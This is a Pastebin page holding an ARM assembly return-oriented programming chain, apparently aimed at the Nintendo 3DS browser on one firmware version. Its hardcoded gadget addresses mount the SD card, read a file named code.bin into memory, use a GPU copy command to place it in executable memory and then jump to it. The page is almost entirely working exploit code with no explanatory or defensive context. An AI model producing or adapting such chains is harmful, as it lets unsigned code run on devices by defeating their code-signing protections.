API tools faq
paste
Advertisement
Guest User

17552/v3088 Spider LoadCode ROP

a guest
May 24th, 2015
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ARM 3.47 KB | None | 0 0
raw download clone embed print report
  1.     .arm
  2.     .section .rodata.rop
  3.  
  4. #define BUFFER_LOC 0x18410000
  5. #define CODE_SIZE 0x00004000
  6. #define CODE_TARGET 0x19592000
  7. #define CODE_JUMP 0x009D2000
  8.  
  9.     .global _start
  10. @---------------------------------------------------------------------------------
  11. _start:
  12.     @ mount SD
  13.         .word 0x0010C320 @ LDMFD   SP!, {R0,PC}
  14.             .word 0x001050CB @ R0 = "dmc:"
  15.         .word 0x0019CA2C @ FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
  16.             .word 0xDEADBEEF @ R3, dummy
  17.             .word 0xDEADBEEF @ R4, dummy
  18.             .word 0xDEADBEEF @ R5, dummy
  19.     @ open file
  20.         .word 0x001946E3 @ POP     {R0-R4,R7,PC}
  21.             .word 0x08F10000 @ R0 = this
  22.             .word FileName @ R1 = filename
  23.             .word 0x00000001 @ R2 = permission
  24.             .word 0xDEADBEEF @ R3, dummy
  25.             .word 0xDEADBEEF @ R4, dummy
  26.             .word 0xDEADBEEF @ R7, dummy
  27.         .word 0x0022FE48 @ IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
  28.             .word 0xDEADBEEF @ R4, dummy
  29.             .word 0xDEADBEEF @ R5, dummy
  30.             .word 0xDEADBEEF @ R6, dummy
  31.             .word 0xDEADBEEF @ R7, dummy
  32.         .word 0x001057E0 @ POP {PC}
  33.     @ read payload
  34.         .word 0x001946E3 @ POP     {R0-R4,R7,PC}
  35.             .word 0x08F10000 @ R0 = this
  36.             .word 0x08F10020 @ R1 = total_read
  37.             .word BUFFER_LOC @ R2 = buffer
  38.             .word CODE_SIZE @ R3 = size
  39.             .word 0xDEADBEEF @ R4, dummy
  40.             .word 0xDEADBEEF @ R7, dummy
  41.         .word 0x001686C4 @ IFile_Read, then LDMFD   SP!, {R4-R9,PC}
  42.             .word 0xDEADBEEF @ R4, dummy
  43.             .word 0xDEADBEEF @ R5, dummy
  44.             .word 0xDEADBEEF @ R6, dummy
  45.             .word 0xDEADBEEF @ R7, dummy
  46.             .word 0xDEADBEEF @ R8, dummy
  47.             .word 0xDEADBEEF @ R9, dummy
  48.     @ flush data cache
  49.         .word 0x0012A3D4 @ pop {r0, r1, r2, r3, r4, pc}
  50.             .word 0x003DA72C @ r0 (handle ptr)
  51.             .word 0xFFFF8001 @ r1 (kprocess handle)
  52.             .word BUFFER_LOC  @ r2 (address)
  53.             .word CODE_SIZE @ r3 (size)
  54.             .word 0xDEADC0DE @ r4 (garbage)
  55.         .word 0x001303A4 @ pop {lr, pc}
  56.             .word 0x001057E0 @ lr (pop {pc})
  57.         .word 0x0012c228 @ GSPGPU_FlushDataCache
  58.     @ send GX command
  59.         .word 0x0010c320 @ pop {r0, pc}
  60.             .word 0x3D7C40+0x58 @ r0 (nn__gxlow__CTR__detail__GetInterruptReceiver)
  61.         .word 0x00228B10 @ pop {r1, pc}
  62.             .word gxCommand @ r1 (cmd addr)
  63.         .word 0x001303A4 @ pop {lr, pc}
  64.             .word 0x001057E0 @ lr (pop {pc})
  65.         .word 0x0012BF4C @ nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue
  66.     @ sleep for a bit
  67.         .word 0x0010c320 @ pop {r0, pc}
  68.             .word 1000000000  @ r0 (one seconds)
  69.         .word 0x00228B10 @ pop {r1, pc}
  70.             .word 0x00000000 @ r1 (nothing)
  71.         .word 0x001303A4 @ pop {lr, pc}
  72.             .word 0x001057E0 @ lr (pop {pc})
  73.         .word 0x0010420C @ svc 0xa | bx lr
  74.     @ jump to code
  75.         .word CODE_JUMP
  76.  
  77. @ Data required for spider rop to work
  78.     .section .rodata.init
  79. InitData:
  80.     .word 0, 0, 0, 0, _start+0x8C, 0, 0, 0, 0, 0
  81.     .word 0, 0, 0, 0, 0, 0, 0, _start, 0x001057E0, 0x001057E0, 0, 0, 0, 0, 0, 0
  82.     .word 0, 0, 0, 0x0010C320, _start+0x218, 0, 0, 0x001057E0, 0, 0, 0, 0, 0, 0, 0, 0
  83.     .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
  84.     .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
  85. Self:
  86.     .word Self, 0x001057E0, 0, 0, 0, 0, 0, 0, 0, 0x00130344, 0, 0, 0, 0, 0
  87.  
  88.     .section .rodata
  89.     .align 2
  90. gxCommand:
  91.     .word 0x00000004 @ command header (SetTextureCopy)
  92.     .word BUFFER_LOC @ source address
  93.     .word CODE_TARGET @ destination address
  94.     .word CODE_SIZE @ size
  95.     .word 0xFFFFFFFF @ dim in
  96.     .word 0xFFFFFFFF @ dim out
  97.     .word 0x00000008 @ flags
  98.     .word 0x00000000 @ unused
  99.  
  100.     .align 2
  101. FileName:
  102.     .string16 "dmc:/code.bin"
  103.  
  104.     .align 2
  105. @ Padding
  106.     .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
  107.     .word 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
  108.     .word 0, 0, 0, 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!